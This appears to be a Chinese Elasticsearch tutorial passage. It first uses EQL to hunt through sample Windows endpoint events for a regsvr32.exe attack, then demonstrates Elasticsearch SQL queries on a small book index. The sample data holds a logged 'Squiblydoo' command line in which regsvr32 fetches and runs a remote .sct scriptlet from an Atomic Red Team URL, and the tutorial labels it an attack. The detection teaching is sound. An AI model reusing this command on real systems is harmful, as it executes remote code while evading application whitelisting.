{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\ncryptsslp.dll" , "name" : "ncryptsslp.dll" } , "@timestamp" : 131883573239170000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\clbcatq.dll" , "name" : "clbcatq.dll" } , "@timestamp" : 131883573240110000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\wldp.dll" , "name" : "wldp.dll" } , "@timestamp" : 131883573240110000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing" , "value" : "Software Publishing" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573240110000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\userenv.dll" , "name" : "userenv.dll" } , "@timestamp" : 131883573240270000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\version.dll" , "name" : "version.dll" } , "@timestamp" : 131883573240430000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\shell32.dll" , "name" : "shell32.dll" } , "@timestamp" : 131883573240430000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\cfgmgr32.dll" , "name" : "cfgmgr32.dll" } , "@timestamp" : 131883573240430000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\mpr.dll" , "name" : "mpr.dll" } , "@timestamp" : 131883573240430000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\sxs.dll" , "name" : "sxs.dll" } , "@timestamp" : 131883573240580000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\gpapi.dll" , "name" : "gpapi.dll" } , "@timestamp" : 131883573240580000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll" , "name" : "OneCoreUAPCommonProxyStub.dll" } , "@timestamp" : 131883573240740000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace" , "value" : "NameSpace" , "key" : "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573240740000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace" , "value" : "NameSpace" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573240740000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders" , "value" : "DelegateFolders" , "key" : "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573240740000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\jscript.dll" , "name" : "jscript.dll" } , "@timestamp" : 131883573240270000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\amsi.dll" , "name" : "amsi.dll" } , "@timestamp" : 131883573240270000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SyncRootManager" , "value" : "SyncRootManager" , "key" : "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573240890000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\edputil.dll" , "name" : "edputil.dll" } , "@timestamp" : 131883573240890000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\Windows.StateRepositoryPS.dll" , "name" : "Windows.StateRepositoryPS.dll" } , "@timestamp" : 131883573240890000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.1810.5-0\\MpOAV.dll" , "name" : "MpOAV.dll" } , "@timestamp" : 131883573240430000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\cldapi.dll" , "name" : "cldapi.dll" } , "@timestamp" : 131883573241050000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\WinTypes.dll" , "name" : "WinTypes.dll" } , "@timestamp" : 131883573241050000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\wshom.ocx" , "name" : "wshom.ocx" } , "@timestamp" : 131883573240430000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475" , "value" : "418A073AA3BC3475" , "key" : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573241200016 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\scrrun.dll" , "name" : "scrrun.dll" } , "@timestamp" : 131883573240430000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.1810.5-0\\MpClient.dll" , "name" : "MpClient.dll" } , "@timestamp" : 131883573240580000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "@timestamp" : 131883573241369984 , "event" : { "category" : "process" , "type" : "termination" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "destination" : { "address" : "151.101.48.133" , "port" : "443" } , "source" : { "address" : "192.168.162.134" , "port" : "50505" } , "network" : { "direction" : "outbound" , "protocol" : "tcp" } , "@timestamp" : 131883573238680000 , "event" : { "category" : "network" } , "user" : { "full_name" : "bob" , "domain" : "ART-DESKTOP" , "id" : "ART-DESKTOP\\bob" } }
# 请求
GET / _cat/ indices/ my- eql- index? v= true & h= health, status, index, docs. count
# 返回
health status index docs. count
yellow open my- eql- index 150
获取与 regsvr32.exe 进程关联的事件数
?filter_path=-hits.events 从响应中排除 hits.events 属性。 此搜索仅用于获取事件计数,而不是匹配事件的列表 query : 匹配任何进程名称为 regsvr32.exe 的事件 size : 最多返回 200 个匹配事件的匹配,实际查询结果为 143 个 # 请求
GET my- eql- index/ _eql/ search? filter_path= - hits. events
{
"query" : "" "
any where process. name == "regsvr32.exe"
"" ",
"size" : 200
}
# 返回
{
"is_partial" : false ,
"is_running" : false ,
"took" : 4 ,
"timed_out" : false ,
"hits" : {
"total" : {
"value" : 143 ,
"relation" : "eq"
}
}
}
regsvr32.exe 进程与 143 个事件相关联。 但是如何首先调用 regsvr32.exe?谁调用的? regsvr32.exe 是一个命令行实用程序。将结果缩小到使用命令行的进程 该查询将一个事件与创建的 event.type 相匹配,指示 regsvr32.exe 进程的开始。根据事件的process.command_line 值,regsvr32.exe 使用 scrobj.dll 注册了脚本 RegSvr32.sct.这符合Squibledoo 攻击的行为 # 增加过滤条件查询数据
GET my- eql- index/ _eql/ search
{
"query" : "" "
process where process. name == "regsvr32.exe" and process. command_line. keyword != null "" "
}
# 返回
{
"is_partial" : false ,
"is_running" : false ,
"took" : 1 ,
"timed_out" : false ,
"hits" : {
"total" : {
"value" : 1 ,
"relation" : "eq"
} ,
"events" : [
{
"_index" : "my-eql-index" ,
"_id" : "ttYDc5QBefqFnzZaY1qF" ,
"_source" : {
"process" : {
"parent" : {
"name" : "cmd.exe" ,
"entity_id" : "{42FC7E13-CBCB-5C05-0000-0010AA385401}" ,
"executable" : "" "C:\Windows\System32\cmd.exe" ""
} ,
"name" : "regsvr32.exe" ,
"pid" : 2012 ,
"entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" ,
"command_line" : "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" ,
"executable" : "" "C:\Windows\System32\regsvr32.exe" "" ,
"ppid" : 2652
} ,
"logon_id" : 217055 ,
"@timestamp" : 131883573237130000 ,
"event" : {
"category" : "process" ,
"type" : "creation"
} ,
"user" : {
"full_name" : "bob" ,
"domain" : "ART-DESKTOP" ,
"id" : "" "ART-DESKTOP\bob" ""
}
}
}
]
}
}
检查 regsvr32.exe 以后是否加载 scrobj.dll 库 # 增加过滤条件查询数据
GET my- eql- index/ _eql/ search
{
"query" : "" "
library where process. name == "regsvr32.exe" and dll. name == "scrobj.dll"
"" "
}
# 返回
{
"is_partial" : false ,
"is_running" : false ,
"took" : 0 ,
"timed_out" : false ,
"hits" : {
"total" : {
"value" : 1 ,
"relation" : "eq"
} ,
"events" : [
{
"_index" : "my-eql-index" ,
"_id" : "1tYDc5QBefqFnzZaY1qF" ,
"_source" : {
"process" : {
"name" : "regsvr32.exe" ,
"pid" : 2012 ,
"entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" ,
"executable" : "" "C:\Windows\System32\regsvr32.exe" ""
} ,
"dll" : {
"path" : "" "C:\Windows\System32\scrobj.dll" "" ,
"name" : "scrobj.dll"
} ,
"@timestamp" : 131883573237450020 ,
"event" : {
"category" : "library"
}
}
}
]
}
}
一般使用 Elasticsearch 的时候,会使用 Query DSL 来查询数据,从 Elasticsearch6.3 版本以后,Elasticsearch 已经支持 SQL 查询了。 Elasticsearch SQL 是一个 X-Pack 组件,它允许针对 Elasticsearch 实时执行类似 SQL 的查询。无论使用 REST 接口,命令行还是 JDBC,任何客户端都可以使用 SQL 对 Elasticsearch中的数据进行原生搜索和聚合数据。可以将 Elasticsearch SQL 看作是一种翻译器,它可以将SQL 翻译成 Query DSL。 Elasticsearch SQL 具有如下特性:
原生支持:Elasticsearch SQL 是专门为 Elasticsearch 打造的。 没有额外的零件:无需其他硬件,处理器,运行环境或依赖库即可查询 Elasticsearch,Elasticsearch SQL 直接在 Elasticsearch 内部运行。 轻巧高效:Elasticsearch SQL 并未抽象化其搜索功能,相反的它拥抱并接受了 SQL 来实现全文搜索,以简洁的方式实时运行全文搜索。 虽然 SQL 和 Elasticsearch 对数据的组织方式(以及不同的语义)有不同的术语,但它们的目的本质上是相同的。 虽然概念之间的映射并不完全是一对一的,语义也有所不同,但共同点多于差异。事实上,SQL 的许多概念可以在 Elasticsearch 中找到对应关系,并且这两者的术语也很类似。
# 创建索引并增加数据,等同于创建表和数据
PUT my- sql- index/ _bulk? refresh
{ "index" : { "_id" : "JAVA" } }
{ "name" : "JAVA" , "author" : "zhangsan" , "release_date" : "2022-05-01" , "page_count" : 561 }
{ "index" : { "_id" : "BIGDATA" } }
{ "name" : "BIGDATA" , "author" : "lisi" , "release_date" : "2022-05-02" , "page_count" : 482 }
{ "index" : { "_id" : "SCALA" } }
{ "name" : "SCALA" , "author" : "wangwu" , "release_date" : "2022-05-03" , "page_count" : 604 }
# 返回
{
"errors" : false ,
"took" : 276618497 ,
"items" : [
{
"index" : {
"_index" : "my-sql-index" ,
"_id" : "JAVA" ,
"_version" : 1 ,
"result" : "created" ,
"forced_refresh" : true ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 0 ,
"_primary_term" : 1 ,
"status" : 201
}
} ,
{
"index" : {
"_index" : "my-sql-index" ,
"_id" : "BIGDATA" ,
"_version" : 1 ,
"result" : "created" ,
"forced_refresh" : true ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 1 ,
"_primary_term" : 1 ,
"status" : 201
}
} ,
{
"index" : {
"_index" : "my-sql-index" ,
"_id" : "SCALA" ,
"_version" : 1 ,
"result" : "created" ,
"forced_refresh" : true ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 2 ,
"_primary_term" : 1 ,
"status" : 201
}
}
]
}
可以通过 format 参数控制返回结果的格式,默认为 json 格式
txt:表示文本格式,看起来更直观点 csv:使用逗号隔开的数据 json:JSON 格式数据 tsv: 使用 tab 键隔开数据 yaml:属性配置格式 # 请求
POST _sql? format= txt
{
"query" : "" "
SELECT * FROM "my-sql-index"
"" "
}
# 返回
author | name | page_count | release_date
-- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- -- -- -- -- --
zhangsan | JAVA | 561 | 2022 - 05 - 01T00: 00 : 00 . 000Z
lisi | BIGDATA | 482 | 2022 - 05 - 02T00: 00 : 00 . 000Z
wangwu | SCALA | 604 | 2022 - 05 - 03T00: 00 : 00 . 000Z
# 请求
POST _sql? format= txt
{
"query" : "" "
SELECT * FROM "my-sql-index" where page_count > 500
"" "
}
# 返回
author | name | page_count | release_date
-- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- -- -- -- -- --
zhangsan | JAVA | 561 | 2022 - 05 - 01T00: 00 : 00 . 000Z
wangwu | SCALA | 604 | 2022 - 05 - 03T00: 00 : 00 . 000Z
当我们需要使用 Query DSL 时,也可以先使用 SQL 来查询,然后通过 Translate API 转换即可,查询的结果为 DSL 方式的结果 # 请求
POST _sql/ translate
{
"query" : "" "
SELECT * FROM "my-sql-index" where page_count > 500
"" "
}
# 返回
{
"size" : 1000 ,
"query" : {
"range" : {
"page_count" : {
"gt" : 500 ,
"boost" : 1
}
}
} ,
"_source" : false ,
"fields" : [
{
"field" : "author"
} ,
{
"field" : "name"
} ,
{
"field" : "page_count"
} ,
{
"field" : "release_date" ,
"format" : "strict_date_optional_time_nanos"
}
] ,
"sort" : [
{
"_doc" : {
"order" : "asc"
}
}
] ,
"track_total_hits" : - 1
}
我们如果在优化 SQL 语句之后还不满足查询需求,可以拿 SQL 和 DSL 混用,ES 会先根据SQL 进行查询,然后根据 DSL 语句对 SQL 的执行结果进行二次查询。 # SQL 和 DSL 混合使用
# 由于索引中含有横线,所以作为表名时需要采用双引号,且外层需要三个引号包含
POST _sql? format= txt
{
"query" : "" "SELECT * FROM " my- sql- index" " "" ,
"filter" : {
"range" : {
"page_count" : {
"gte" : 400 ,
"lte" : 600
}
}
} ,
"fetch_size" : 2
}
# 返回
author | name | page_count | release_date
-- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- -- -- -- -- --
zhangsan | JAVA | 561 | 2022 - 05 - 01T00: 00 : 00 . 000Z
lisi | BIGDATA | 482 | 2022 - 05 - 02T00: 00 : 00 . 000Z
# 请求
GET _sql? format= txt
{
"query" : "" "
show tables
"" "
}
# 返回
catalog | name | type | kind
-- -- -- -- -- -- -- - + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- -
elasticsearch | . alerts- default . alerts- default | VIEW | ALIAS
elasticsearch | . alerts- ml. anomaly- detection- health. alerts- default | VIEW | ALIAS
elasticsearch | . alerts- ml. anomaly- detection. alerts- default | VIEW | ALIAS
elasticsearch | . alerts- observability. apm. alerts- default | VIEW | ALIAS
elasticsearch | . alerts- observability. logs. alerts- default | VIEW | ALIAS
elasticsearch | . alerts- observability. metrics. alerts- default | VIEW | ALIAS
elasticsearch | . alerts- observability. slo. alerts- default | VIEW | ALIAS
elasticsearch | . alerts- observability. threshold. alerts- default | VIEW | ALIAS
elasticsearch | . alerts- observability. uptime. alerts- default | VIEW | ALIAS
elasticsearch | . alerts- security. alerts- default | VIEW | ALIAS
elasticsearch | . alerts- stack. alerts- default | VIEW | ALIAS
elasticsearch | . alerts- transform. health. alerts- default | VIEW | ALIAS
elasticsearch | . kibana- observability- ai- assistant- conversations | VIEW | ALIAS
elasticsearch | . kibana- observability- ai- assistant- kb | VIEW | ALIAS
elasticsearch | . siem- signals- default | VIEW | ALIAS
elasticsearch | gmall | TABLE | INDEX
elasticsearch | my- eql- index | TABLE | INDEX
elasticsearch | my- sql- index | TABLE | INDEX
elasticsearch | shopping | TABLE | INDEX
elasticsearch | teacher | TABLE | INDEX
# 请求
GET _sql? format= txt
{
"query" : "" "
show tables like 'my-eql-index'
"" "
}
# 返回
catalog | name | type | kind
-- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- -
elasticsearch | my- eql- index | TABLE | INDEX
# 请求
GET _sql? format= txt
{
"query" : "" "
show tables like 'my-%'
"" "
}
# 返回
catalog | name | type | kind
-- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- -
elasticsearch | my- eql- index | TABLE | INDEX
